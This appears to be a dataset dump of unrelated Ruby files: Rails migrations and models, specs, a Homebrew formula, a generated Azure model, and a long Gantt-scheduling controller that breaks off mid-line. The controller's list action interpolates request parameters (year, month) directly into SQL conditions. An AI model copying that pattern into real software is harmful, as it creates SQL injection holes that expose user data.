#{params[:experiment_filepath]}" end # Instructions for exporting measurements from a qPCR run # # @return [String] def export_measurements 'Click <b>Export</b><br>' \ 'Select <b>Export All Data Sheets</b><br>' \ 'Export all sheets as CSV<br>' \ "Save files to the #{params[:export_filepath]} directory" end end
28.337838
79
0.705055
b9245cd39a54c6b101d200bb149e7d030aff7132
154
class CreateShoppings < ActiveRecord::Migration def change create_table :shoppings do |t| t.string :name t.timestamps end end end
17.111111
47
0.681818
2886d534cdfa20108926cbd7ffb55bb4fdb598fd
1,124
require "language/node" class Whistle < Formula desc "HTTP, HTTP2, HTTPS, Websocket debugging proxy" homepage "https://github.com/avwo/whistle" url "https://registry.npmjs.org/whistle/-/whistle-2.6.7.tgz" sha256 "cc93aa4e5ff46c80edf7754878e55494f199481b800d2ba19c0e4996358ef633" license "MIT" bottle do sha256 cellar: :any_skip_relocation, arm64_big_sur: "89d75d8fd94e6bb272787d1e30da2981dc9820f340dd52d7a40c111a0d5d50dc" sha256 cellar: :any_skip_relocation, big_sur: "06016938110db64a8645a7729d10a0120aa342e06d2414a9ffca4519c60eb4ef" sha256 cellar: :any_skip_relocation, catalina: "b0b7eacff7379d821cfcb338c23b4484c0a1d4bc39aa2d862413a6f6d030ac70" sha256 cellar: :any_skip_relocation, mojave: "7937d9c596a5afb57f45c28b8d0c0d576f9ae1a75a7cd7cb12237919dc793aeb" end depends_on "node" def install system "npm", "install", *Language::Node.std_npm_install_args(libexec) bin.install_symlink Dir["#{libexec}/bin/*"] end test do (testpath/"package.json").write('{"name": "test"}') system bin/"whistle", "start" system bin/"whistle", "stop" end end
37.466667
122
0.764235
915efce428f3d1e6a57b8e83c255ebdef170461f
127
class AddScoreToSubmission < ActiveRecord::Migration[5.0] def change add_column :submissions, :score, :integer end end
21.166667
57
0.755906
91cf6531e4d1f5765486ecf78d65f511aa0b43a1
1,171
require 'spec_view_helper' # As of 3.0.x :type tags are no longer inferred. # This means, without the `type: :view` tag, the render method does not exist # in the example context describe 'hydramata/works/fieldsets/_show.html.erb', type: :view do let(:object) { double('Object', properties: [property1, property2], container_content_tag_attributes: { class: 'my-dom-class' } ) } # A short circuit as the render does not normally let(:property1) { double('Property', render: '<div class="property1">Property 1</div>'.html_safe) } let(:property2) { double('Property', render: '<div class="property2">Property 2</div>'.html_safe) } it 'renders the object and fieldsets' do expect(object).to receive(:label).and_return('Heading') render partial: 'hydramata/works/fieldsets/show', object: object expect(property1).to have_received(:render).with(view) expect(property2).to have_received(:render).with(view) expect(rendered).to have_tag('section.my-dom-class') do with_tag('.heading', text: 'Heading') with_tag('.metadata .property1', text: 'Property 1') with_tag('.metadata .property2', text: 'Property 2') end end end
46.84
134
0.708796
39a46fbb1c72728ea70212962014e2419f341fc9
144
class Tag < ApplicationRecord has_many :taggings has_many :records, through: :taggings belongs_to :user validates_presence_of :name end
20.571429
39
0.784722
acff75b03b292e8a0511c1436ff6c9a614be1adc
4,598
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::DataFactory::Mgmt::V2018_06_01 module Models # # The Dynamics CRM entity dataset. # class DynamicsCrmEntityDataset < Dataset include MsRestAzure def initialize @type = "DynamicsCrmEntity" end attr_accessor :type # @return The logical name of the entity. Type: string (or Expression # with resultType string). attr_accessor :entity_name # # Mapper for DynamicsCrmEntityDataset class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'DynamicsCrmEntity', type: { name: 'Composite', class_name: 'DynamicsCrmEntityDataset', model_properties: { additional_properties: { client_side_validation: true, required: false, type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'ObjectElementType', type: { name: 'Object' } } } }, description: { client_side_validation: true, required: false, serialized_name: 'description', type: { name: 'String' } }, structure: { client_side_validation: true, required: false, serialized_name: 'structure', type: { name: 'Object' } }, schema: { client_side_validation: true, required: false, serialized_name: 'schema', type: { name: 'Object' } }, linked_service_name: { client_side_validation: true, required: true, serialized_name: 'linkedServiceName', default_value: {}, type: { name: 'Composite', class_name: 'LinkedServiceReference' } }, parameters: { client_side_validation: true, required: false, serialized_name: 'parameters', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'ParameterSpecificationElementType', type: { name: 'Composite', class_name: 'ParameterSpecification' } } } }, annotations: { client_side_validation: true, required: false, serialized_name: 'annotations', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'ObjectElementType', type: { name: 'Object' } } } }, folder: { client_side_validation: true, required: false, serialized_name: 'folder', type: { name: 'Composite', class_name: 'DatasetFolder' } }, type: { client_side_validation: true, required: true, serialized_name: 'type', type: { name: 'String' } }, entity_name: { client_side_validation: true, required: false, serialized_name: 'typeProperties.entityName', type: { name: 'Object' } } } } } end end end end
30.052288
75
0.418878
ff717296c622e717d351aa626bad757843090419
905
require File.expand_path('../../../spec_helper', __FILE__) describe "Regexp#options" do it "returns a Fixnum bitvector of regexp options for the Regexp object" do /cat/.options.should be_kind_of(Fixnum) /cat/ix.options.should be_kind_of(Fixnum) end it "allows checking for presence of a certain option with bitwise &" do (/cat/.options & Regexp::IGNORECASE).should == 0 (/cat/i.options & Regexp::IGNORECASE).should_not == 0 (/cat/.options & Regexp::MULTILINE).should == 0 (/cat/m.options & Regexp::MULTILINE).should_not == 0 (/cat/.options & Regexp::EXTENDED).should == 0 (/cat/x.options & Regexp::EXTENDED).should_not == 0 (/cat/mx.options & Regexp::MULTILINE).should_not == 0 (/cat/mx.options & Regexp::EXTENDED).should_not == 0 (/cat/xi.options & Regexp::IGNORECASE).should_not == 0 (/cat/xi.options & Regexp::EXTENDED).should_not == 0 end end
41.136364
76
0.677348
03964ef089b6bfdfbc6b0d1d57549676806b82d3
2,117
# frozen_string_literal: true require File.expand_path(File.dirname(__FILE__) + '/../spec_helper') describe Cadenza::FilterNode do it 'should take an identifier' do filter = Cadenza::FilterNode.new('trim') expect(filter.identifier).to eq('trim') end it 'should be equal to another filter with the same name' do filter_a = Cadenza::FilterNode.new('trim') filter_b = Cadenza::FilterNode.new('trim') expect(filter_a).to eq(filter_b) end it 'should not equal another node with a different name' do filter_a = Cadenza::FilterNode.new('trim') filter_b = Cadenza::FilterNode.new('cut') expect(filter_a).not_to eq(filter_b) end it 'should equal a node with the same parameters' do filter_a = Cadenza::FilterNode.new('trim', [Cadenza::ConstantNode.new(10)]) filter_b = Cadenza::FilterNode.new('trim', [Cadenza::ConstantNode.new(10)]) expect(filter_a).to eq(filter_b) end it 'should not equal a node with different parameters' do filter_a = Cadenza::FilterNode.new('trim', [Cadenza::ConstantNode.new(10)]) filter_b = Cadenza::FilterNode.new('trim', [Cadenza::ConstantNode.new(30)]) expect(filter_a).not_to eq(filter_b) end it 'should take a list of parameter nodes' do constant_a = Cadenza::ConstantNode.new(10) filter = Cadenza::FilterNode.new('cut', [constant_a]) expect(filter.identifier).to eq('cut') expect(filter.parameters).to eq([constant_a]) end it 'should evaluate the filter on a value given a context' do klass = Class.new(Cadenza::Context) klass.define_filter(:floor) { |value, _params| value.floor } context = klass.new filter = Cadenza::FilterNode.new('floor') expect(filter.evaluate(context, 3.14159)).to eq(3) end it 'should pass parameters to the filter function when evaluating' do klass = Class.new(Cadenza::Context) klass.define_filter(:add) { |value, params| value + params.first } context = klass.new filter = Cadenza::FilterNode.new('add', [Cadenza::ConstantNode.new(1)]) expect(filter.evaluate(context, 3.14159)).to eq(4.14159) end end
29.816901
79
0.699103
39d6606ee57271b9a5eacdbb1e31186688bdf42f
34,315
# Generate a calendar showing completed and due Tasks for a Company # TODO: Simple Events class ScheduleController < ApplicationController helper_method :gantt_offset helper_method :gantt_width helper_method :gantt_color def list today = Time.now.to_date @year = params[:year] unless params[:year].nil? @month = params[:month] unless params[:month].nil? @year ||= today.year @month ||= today.month # Find all tasks for the current month, should probably be adjusted to use # TimeZone for current User instead of UTC. conditions = "tasks.project_id IN (#{current_project_ids}) AND tasks.company_id = '#{current_user.company_id}' AND ((tasks.due_at is NOT NULL AND tasks.due_at > '#{@year}-#{@month}-01 00:00:00' AND tasks.due_at < '#{@year}-#{@month}-31 23:59:59') OR (tasks.completed_at is NOT NULL AND tasks.completed_at > '#{@year}-#{@month}-01 00:00:00' AND tasks.completed_at < '#{@year}-#{@month}-31 23:59:59'))" task_filter = TaskFilter.new(self, params, conditions) @tasks = task_filter.tasks @milestones = Milestone.find(:all, :conditions => ["company_id = ? AND project_id IN (#{current_project_ids})", current_user.company_id]) @dates = {} # Mark milestones @milestones.each do |m| unless m.due_at.nil? @dates[tz.utc_to_local(m.due_at).to_date] ||= [] @dates[tz.utc_to_local(m.due_at).to_date] << m end end # Mark all tasks @tasks.each do |t| due_date = tz.utc_to_local(t.due_at).to_date unless t.due_at.nil? due_date ||= tz.utc_to_local(t.completed_at).to_date unless t.completed_at.nil? @dates[due_date] ||= [] duration = t.duration days = (duration / (60*8)) - 1 days = 0 if days < 0 found = false slot = 0 until found found = true done = days d = -1 while done >= 0 d += 1 wday1 = (due_date - d) wday2 = (due_date.wday) dpw = current_user.days_per_week next if( ((wday1 == 0 && dpw < 7) || (wday1 == 6 && dwp < 6)) && !((wday2 == 0 && dpw < 7) || (wday2 == 6 && dpw <6)) ) unless @dates[due_date - d].nil? || @dates[due_date - d][slot].nil? found = false end done -= 1 end slot += 1 unless found end while days >= 0 days -= 1 @dates[due_date] ||= [] @dates[due_date][slot] = t due_date -= 1.days due_date -= 1.days if due_date.wday == 6 && current_user.days_per_week < 6 due_date -= 2.days if due_date.wday == 0 && current_user.days_per_week < 7 end end end # New event def new end # Edit event def edit end # Create event def create end # Update event def update end # Delte event def delete end # Refresh calendar on Event addition / task completion def refresh end def users_gantt_free(dates, t, date, rev = false) free = true t.users.each do |u| next unless free date_check = date dur = t.scheduled_minutes_left while dur > 0 && free day_dur = dur > u.workday_duration ? u.workday_duration : dur logger.debug("--> #{t.id}: Checking [#{date_check}] for #{day_dur}") dates[date_check] ||= { } dates[date_check][u.id] ||= 0 if dates[date_check][u.id].to_i + day_dur > u.workday_duration free = false logger.debug("--> #{t.id}: Not free..") end date_check += 1.day if date_check.wday == 6 && current_user.days_per_week < 6 date_check += 2.days end if date_check.wday == 0 && current_user.days_per_week < 7 date_check += 1.days end dur -= day_dur if free logger.debug("--> #{t.id}: #{dur} left to find...") end end free end def users_gantt_mark(dates, t, date, rev = false) end_date = date start_date = date.midnight t.users.each do |u| dur = t.scheduled_minutes_left day = date + dates[date][u.id].minutes start_date = day if day > start_date while dur > 0 day_dur = dur > u.workday_duration ? 
u.workday_duration : dur dates[day.midnight][u.id] += day_dur if (dur <= u.workday_duration) day += dur.minutes end end_date = day if end_date < day day += 1.day if day.wday == 6 && current_user.days_per_week < 6 day += 2.days end if day.wday == 0 && current_user.days_per_week < 7 day += 1.days end dur -= day_dur end end [start_date,end_date] end def schedule_direction(dates, t, before = nil, after = nil) if t.scheduled_date || before || after day = nil day = (t.scheduled_date).midnight if t.scheduled_date day ||= before day ||= after rev = after.nil? ? true : false day, rev = override_day(t, day, before, after, rev) if day < current_user.tz.now.midnight day = current_user.tz.now.midnight rev = false logger.debug "--> #{t.id}[##{t.task_num}] forwards due to #{day} < #{current_user.tz.now.midnight}" end logger.info("--> #{t.id}[##{t.task_num}]}: [#{t.scheduled_minutes_left}] [#{t.scheduled_date}] => #{day} : #{rev ? "backwards" : "forwards"}") else day = (current_user.tz.now.midnight) rev = false override_day(t,day,before,after, rev) logger.debug "--> #{t.id}[##{t.task_num}] forwards due to no due date" end rev end def schedule_collect_deps(deps, seen, t, rev = false) # return deps[t.id] if deps.keys.include?(t.id) return [t] if seen.include?(t) seen << t my_deps = [] unless rev end my_deps << t unless t.done? if t.milestone && t.milestone.scheduled_date t.dependants.each do |d| my_deps += schedule_collect_deps(deps, seen, d, rev) end else t.dependencies.each do |d| my_deps += schedule_collect_deps(deps, seen, d, rev) end end seen.pop my_deps.compact! my_deps.uniq! deps[t.id] = my_deps if my_deps.size > 0 logger.debug("--> #{t.id} my_deps[#{my_deps.collect{ |dep| "#{dep.id}[##{dep.task_num}]" }.join(',')}] #{rev}") my_deps end def override_day(t, day, before, after, rev) logger.debug "--> #{t.id} override got day[#{day.to_s}], before[#{before}], after[#{after}], due[#{t.scheduled_due_at}], #{rev}" days = ((t.scheduled_minutes_left) / current_user.workday_duration).to_i rem = t.scheduled_minutes_left - (days * current_user.workday_duration) dur = days.days + rem.minutes if dur > 7.days dur += (dur/7.days) * 2.days end if rev if (before && before < day) && (t.scheduled_due_at.nil? || before < t.scheduled_due_at) day = (before - days.days - rem.minutes).midnight logger.debug "--> #{t.id} force before #{day}" rev = true elsif (t.scheduled_due_at && before.nil?) || (before && t.scheduled_due_at && t.scheduled_due_at < before) || (before && t.scheduled_date && t.scheduled_date < before) day = t.scheduled_due_at ? 
t.scheduled_due_at.midnight : t.scheduled_date.midnight logger.debug "--> #{t.id} force before #{day} [due] " # if day.wday == 6 # day -= 1.days # dur += 1.days # end if day.wday == 0 && current_user.days_per_week < 7 day -= 1.days dur += 2.days end day -= rem.minutes while days > 0 if day.wday == 0 && current_user.days_per_week < 7 day -= 2.days dur += 2.days elsif day.wday == 6 && current_user.days_per_week < 6 day -= 1.days dur += 2.days days -= 1 else day -= 1.day days -= 1 end logger.debug "--> #{t.id} force before #{day} - #{days} left [due] " end logger.debug "--> #{t.id} force before #{day.wday} -> #{(day+dur).wday} [due] " if day.wday == 6 && current_user.days_per_week < 6 day -= 2.days end if day.wday == 0 && current_user.days_per_week < 7 day -= 2.days end logger.debug "--> #{t.id} force before #{day} -> #{(day+dur)} [due] " else if day.wday == 0 && current_user.days_per_week < 7 day -= 1.days dur += 2.days end day -= rem.minutes while days > 0 if day.wday == 0 && current_user.days_per_week < 7 day -= 2.days dur += 2.days elsif day.wday == 6 && current_user.days_per_week < 6 day -= 1.days dur += 2.days days -= 1 else day -= 1.day days -= 1 end logger.debug "--> #{t.id} force before #{day} - #{days} left" end end end unless rev if after && after > day && (t.scheduled_due_at.nil? || after < (t.scheduled_due_at + days.days + rem.minutes)) day = after.midnight logger.debug "--> #{t.id} force after #{day}" rev = false elsif (t.scheduled_due_at && after.nil? ) || (after && t.scheduled_due_at && (t.scheduled_due_at - days.days - rem.minutes ) < after) day = (t.scheduled_due_at.midnight - days.days - rem.minutes).midnight logger.debug "--> #{t.id} force after #{day} [due]" rev = true end end if rev day -= 1.days if day.wday == 6 && current_user.days_per_week < 6 day -= 2.days if day.wday == 0 && current_user.days_per_week < 7 else day += 2.days if day.wday == 6 && current_user.days_per_week < 6 day += 1.days if day.wday == 0 && current_user.days_per_week < 7 end day = Time.now.utc.midnight if day < Time.now.utc.midnight logger.debug "--> #{t.id} override returned day[#{day.to_s}], #{rev}]" [day.midnight,rev] end def schedule_gantt(dates,t, before = nil, after = nil) logger.info "--> #{t.id} scheduling #{"before " + before.to_s if before}#{"after " + after.to_s if after}" rev = schedule_direction(dates,t,before, after) @deps ||= {} @seen ||= [] schedule_collect_deps(@deps, @seen, t, rev) # rescheduled = @deps[t.id].size > 1 logger.info "--> #{t.id} deps: #{@deps[t.id].size}[#{@deps[t.id].collect{|d| d.task_num }.join(',')}] #{rev}" unless @deps[t.id].blank? range = [] min_start = max_start = nil # if rev my_deps = @deps[t.id].slice!( @deps[t.id].rindex(t) .. -1 ) rescue [] # else # my_deps = @deps[t.id].slice!( 0 .. @deps[t.id].rindex(t) ) # end # @deps[t.id] -= my_deps while !my_deps.blank? d = rev ? my_deps.pop : my_deps.pop next if d.id == t.id if rev before = min_start.midnight if min_start && (before.nil? || min_start.midnight < before) else after = max_start.midnight if max_start && (after.nil? 
|| max_start.midnight > after) end # break unless rev logger.info "--> #{t.id}[##{t.task_num}] => depends on #{d.id}[##{d.task_num}]" if rev range = schedule_task(dates, d, min_start, nil) else range = schedule_task(dates, d, nil, max_start) end logger.debug "--> #{t.id} min_start/max_start #{range.inspect}" min_start ||= range[0].midnight if range[0] min_start = range[0].midnight if range[0] && range[0] < min_start max_start ||= range[1] if range[1] max_start = range[1] if range[1] && range[1] > max_start logger.debug("--> #{t.id} min_start #{min_start}") logger.debug("--> #{t.id} max_start #{max_start}") end rev = schedule_direction(dates, t, before, after) #if rescheduled day = (t.scheduled_date).midnight if t.scheduled_date day ||= Time.now.utc.midnight if min_start && min_start < day && rev before = min_start.midnight after = nil elsif max_start && max_start > day && !rev after = max_start.midnight before = nil end logger.debug "--> #{t.id} scheduling got day[#{day.to_s}], before[#{before}], after[#{after}], due[#{t.scheduled_due_at}] - #{rev ? "backwards" : "forwards"}" day, rev = override_day(t, day, before, after, rev) logger.debug "--> #{t.id} scheduling got adjusted day[#{day.to_s}], before[#{before}], after[#{after}], due[#{t.scheduled_due_at}] - #{rev ? "backwards" : "forwards"}" if t.scheduled_minutes_left == 0 return [day,day] end found = false logger.debug "--> #{t.id} scheduling looking #{day.to_s} #{rev ? "backwards" : "forwards"}" while found == false found = true if users_gantt_free(dates, t, day) day, end_date = users_gantt_mark(dates, t, day) if t.users.empty? end_date = day + t.scheduled_minutes_left.minutes end return [day, end_date] else found = false if rev day -= 1.day if day.wday == 0 && current_user.days_per_week < 7 day -= 2.days end if day.wday == 6 && current_user.days_per_week < 6 day -= 1.days end if day < current_user.tz.now.midnight day = current_user.tz.now.midnight rev = false logger.debug("--> switching direction #{t.id}") if day.wday == 6 && current_user.days_per_week < 6 day += 2.days end if day.wday == 0 && current_user.days_per_week < 7 day += 1.days end end else day += 1.day if day.wday == 6 && current_user.days_per_week < 6 day += 2.days end if day.wday == 0 && current_user.days_per_week < 7 day += 1.days end end end end end def schedule_task(dates, t, before = nil, after = nil) return [@start[t.id], @end[t.id]] if @start.keys.include?(t.id) || @stack.include?(t.id) @stack << t.id range = schedule_gantt(@dates, t, before, after ) @start[t.id] = range[0] @end[t.id] = range[1] @range[0] ||= range[0] @range[0] = range[0] if range[0] < @range[0] @range[1] ||= range[1] @range[1] = range[1] if range[1] > @range[1] if t.milestone_id.to_i > 0 @milestone_start[t.milestone_id] ||= range[0] @milestone_start[t.milestone_id] = range[0] if @milestone_start[t.milestone_id] > range[0] @milestone_end[t.milestone_id] ||= range[1] @milestone_end[t.milestone_id] = range[1] if @milestone_end[t.milestone_id] < range[1] end logger.info "== #{t.id}[##{t.task_num}] [#{format_duration(t.scheduled_minutes_left, current_user.duration_format, current_user.workday_duration, current_user.days_per_week)}] : #{@start[t.id]} -> #{@end[t.id]}" @stack.pop return range end def gantt task_filter = TaskFilter.new(self, params) @tasks = task_filter.tasks @displayed_tasks = @tasks @dates = { } @start = { } @end = { } @range = [Time.now.utc.midnight, 1.month.since.utc.midnight] @milestone_start = { } @milestone_end = { } start_date = current_user.tz.now.midnight + 8.hours tasks = 
@tasks.select{ |t| t.scheduled_due_at } # all tasks with due dates @milestones = @tasks.select{ |t| t.scheduled_due_at.nil? && t.milestone && t.milestone.scheduled_date }.reverse # all tasks with milestone with due date tasks += @milestones.select{ |t| t.dependencies.size == 0 && t.dependants.size == 0} tasks += @milestones.select{ |t| t.dependencies.size > 0 && t.dependants.size == 0} tasks += @milestones.select{ |t| t.dependencies.size > 0 && t.dependants.size > 0} tasks += @milestones.select{ |t| t.dependencies.size == 0 && t.dependants.size > 0} non_due = @tasks.reject{ |t| t.scheduled_due_at } # all tasks without due date tasks += non_due.select{ |t| t.dependencies.size == 0 && t.dependants.size > 0} tasks += non_due.select{ |t| t.dependencies.size > 0 && t.dependants.size > 0} tasks += non_due.select{ |t| t.dependencies.size > 0 && t.dependants.size == 0} tasks += non_due.select{ |t| t.dependencies.size == 0 && t.dependants.size == 0} @schedule_in_progress = false for task in @tasks if task.scheduled? && (task.scheduled_at != task.due_at || task.scheduled_duration != task.duration) @schedule_in_progress = true break end if task.milestone && task.milestone.scheduled? && task.milestone.scheduled_at != task.milestone.due_at @schedule_in_progress = true break end end @stack = [] tasks.each do |t| t.dependencies.each do |d| schedule_task(@dates,d) end schedule_task(@dates,t) end end def gantt_reset projects = current_user.projects.select{ |p| current_user.can?(p, 'prioritize')}.collect(&:id).join(',') projects = "0" if projects.nil? || projects.length == 0 Task.update_all("scheduled=0, scheduled_at=NULL, scheduled_duration = 0", ["tasks.project_id IN (#{projects}) AND tasks.completed_at IS NULL"]) projects = current_user.projects.select{ |p| current_user.can?(p, 'milestone')}.collect(&:id).join(',') projects = "0" if projects.nil? || projects.length == 0 Milestone.update_all("scheduled=0, scheduled_at=NULL", ["milestones.project_id IN (#{projects}) AND milestones.completed_at IS NULL"]) flash['notice'] = _('Schedule reverted') render :update do |page| page.redirect_to :action => 'gantt' end end def gantt_save projects = current_user.projects.select{ |p| current_user.can?(p, 'prioritize')}.collect(&:id).join(',') projects = "0" if projects.nil? || projects.length == 0 tasks = Task.find(:all, :conditions => ["tasks.project_id IN (#{projects}) AND tasks.completed_at IS NULL AND scheduled=1"]) tasks.each do |t| body = "" if t.scheduled_at != t.due_at old_name = "None" old_name = current_user.tz.utc_to_local(t.due_at).strftime_localized("%A, %d %B %Y") unless t.due_at.nil? new_name = "None" new_name = current_user.tz.utc_to_local(t.scheduled_at).strftime_localized("%A, %d %B %Y") unless t.scheduled_at.nil? 
body << "- <strong>Due</strong>: #{old_name} -> #{new_name}\n" t.due_at = t.scheduled_at end if t.scheduled_duration.to_i != t.duration.to_i body << "- <strong>Estimate</strong>: #{worked_nice(t.duration).strip} -> #{worked_nice(t.scheduled_duration)}\n" t.duration = t.scheduled_duration end if body != "" worklog = WorkLog.new worklog.log_type = EventLog::TASK_MODIFIED worklog.user = current_user worklog.company = t.project.company worklog.customer = t.project.customer worklog.project = t.project worklog.task = t worklog.started_at = Time.now.utc worklog.duration = 0 worklog.body = body worklog.save if(params['notify'].to_i == 1) Notifications::deliver_changed( :updated, t, current_user, body.gsub(/<[^>]*>/,'')) rescue nil end Juggernaut.send( "do_update(0, '#{url_for(:controller => 'tasks', :action => 'update_tasks', :id => t.id)}');", ["tasks_#{current_user.company_id}"]) end t.scheduled_at = nil t.scheduled_duration = 0 t.scheduled = false t.save end projects = current_user.projects.select{ |p| current_user.can?(p, 'milestone')}.collect(&:id).join(',') projects = "0" if projects.nil? || projects.length == 0 milestones = Milestone.find(:all, :conditions => ["milestones.project_id IN (#{projects}) AND milestones.completed_at IS NULL AND scheduled=1"]) milestones.each do |m| if m.due_at != m.scheduled_at m.due_at = m.scheduled_at if(params['notify'].to_i == 1) Notifications::deliver_milestone_changed(current_user, m, 'updated', m.due_at) rescue nil end end m.scheduled_at = nil m.scheduled = false m.save end Juggernaut.send( "do_update(0, '#{url_for(:controller => 'activities', :action => 'refresh')}');", ["activity_#{current_user.company_id}"]) flash['notice'] = _('Schedule saved') render :update do |page| page.redirect_to :action => 'gantt' end end def reschedule begin @task = Task.find(params[:id], :conditions => ["tasks.project_id IN (#{current_project_ids}) AND tasks.company_id = '#{current_user.company_id}'"] ) rescue render :nothing => true return end unless @task.scheduled? @task.scheduled_duration = @task.duration @task.scheduled_at = @task.due_at @task.scheduled = true end if params[:duration] @task.scheduled_duration = parse_time(params[:duration], true) end if params[:due] && params[:due].length > 0 begin due = DateTime.strptime( params[:due], current_user.date_format ) @task.scheduled_at = tz.local_to_utc(due.to_time + 1.day - 1.minute) unless due.nil? rescue render :update do |page| page["due-#{@task.dom_id}"].value = (@task.scheduled_at ? @task.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_at != @task.due_at) ? "scheduled" : "") end return end elsif params[:due] @task.scheduled_at = nil end @task.save gantt render :update do |page| if @schedule_in_progress page << "if( !$('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').show();" page << "}" else page << "if( $('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').hide();" page << "}" end page["duration-#{@task.dom_id}"].value = worked_nice(@task.scheduled_duration) page["duration-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_duration != @task.duration) ? "scheduled" : "") page["due-#{@task.dom_id}"].value = (@task.scheduled_at ? @task.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_at != @task.due_at) ? 
"scheduled" : "") page << "$('width-#{@task.dom_id}').setStyle({ backgroundColor:'#{gantt_color(@task)}'});" milestones = { } @displayed_tasks.each do |t| page << "$('offset-#{t.dom_id}').setStyle({ left:'#{gantt_offset(@start[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ width:'#{gantt_width(@start[t.id],@end[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ backgroundColor:'#{gantt_color(t)}'});" milestones[t.milestone_id] = t.milestone if t.milestone_id.to_i > 0 end milestones.values.each do |m| page.replace_html "duration-#{m.dom_id}", worked_nice(m.duration) if m.scheduled_date page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(m.scheduled_date.midnight.to_time)}'});" else page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_end[m.id])}'});" end page << "$('offset-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_start[m.id])}'});" page << "$('offset-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id]).to_i + 500}px'});" page << "$('width-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id])}'});" end end end def reschedule_milestone begin @milestone = Milestone.find(params[:id], :conditions => ["milestones.project_id IN (#{current_project_ids})"] ) rescue render :nothing => true return end unless @milestone.scheduled? @milestone.scheduled_at = @milestone.due_at @milestone.scheduled = true end if params[:due] && params[:due].length > 0 begin due = DateTime.strptime( params[:due], current_user.date_format ) @milestone.scheduled_at = tz.local_to_utc(due.to_time + 1.day - 1.minute) unless due.nil? rescue render :update do |page| page["due-#{@milestone.dom_id}"].value = (@milestone.scheduled_at ? @milestone.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@milestone.dom_id}"].className = ((@milestone.scheduled? && @milestone.scheduled_at != @milestone.due_at) ? "scheduled" : "") end return end elsif params[:due] @milestone.scheduled_at = nil end @milestone.save gantt render :update do |page| if @schedule_in_progress page << "if( !$('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').show();" page << "}" else page << "if( $('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').hide();" page << "}" end page["due-#{@milestone.dom_id}"].value = (@milestone.scheduled_at ? @milestone.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@milestone.dom_id}"].className = ((@milestone.scheduled? && @milestone.scheduled_at != @milestone.due_at) ? 
"scheduled" : "") milestones = { } @displayed_tasks.each do |t| page << "$('offset-#{t.dom_id}').setStyle({ left:'#{gantt_offset(@start[t.id])}'});" page << "$('offset-#{t.dom_id}').setStyle({ width:'#{gantt_width(@start[t.id],@end[t.id]).to_i + 500}px'});" page << "$('width-#{t.dom_id}').setStyle({ width:'#{gantt_width(@start[t.id],@end[t.id])}'});" page << "$('width-#{t.dom_id}').setStyle({ backgroundColor:'#{gantt_color(t)}'});" milestones[t.milestone_id] = t.milestone if t.milestone_id.to_i > 0 end milestones.values.each do |m| page.replace_html "duration-#{m.dom_id}", worked_nice(m.duration) if m.scheduled_date page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(m.scheduled_date.midnight.to_time)}'});" else page << "$('offset-due-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_end[m.id])}'});" end page << "$('offset-#{m.dom_id}').setStyle({ left:'#{gantt_offset(@milestone_start[m.id])}'});" page << "$('offset-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id]).to_i + 500}px'});" page << "$('width-#{m.dom_id}').setStyle({ width:'#{gantt_width(@milestone_start[m.id], @milestone_end[m.id])}'});" end end end def gantt_drag begin if params[:id].include?('-due-') @milestone = Milestone.find(params[:id].split("-").last, :conditions => ["milestones.project_id IN (#{current_project_ids})"] ) else @task = Task.find(params[:id].split("-").last, :conditions => ["tasks.project_id IN (#{current_project_ids}) AND tasks.company_id = '#{current_user.company_id}'"] ) end rescue render :nothing => true return end x = params[:x].to_i x = 0 if x < 0 start_date = Time.now.utc.midnight + (x / 16).days end_date = start_date + ((params[:w].to_i - 501)/16).days + 1.day if @milestone unless @milestone.scheduled? @milestone.scheduled_at = @milestone.due_at @milestone.scheduled = true end @milestone.scheduled_at = tz.local_to_utc(start_date.to_time + 1.day - 1.minute) unless start_date.nil? @milestone.save else unless @task.scheduled? @task.scheduled_duration = @task.duration @task.scheduled_at = @task.due_at @task.scheduled = true end @task.scheduled_at = tz.local_to_utc(end_date.to_time + 1.day - 1.minute) unless end_date.nil? @task.save end gantt render :update do |page| if @schedule_in_progress page << "if( !$('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').show();" page << "}" else page << "if( $('gantt-save-revert').visible() ) {" page << "$('gantt-save-revert').hide();" page << "}" end if @milestone page["due-#{@milestone.dom_id}"].value = (@milestone.scheduled_at ? @milestone.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@milestone.dom_id}"].className = ((@milestone.scheduled? && @milestone.scheduled_at != @milestone.due_at) ? "scheduled" : "") else page["due-#{@task.dom_id}"].value = (@task.scheduled_at ? @task.scheduled_at.strftime_localized(current_user.date_format) : "") page["due-#{@task.dom_id}"].className = ((@task.scheduled? && @task.scheduled_at != @task.due_at) ? 
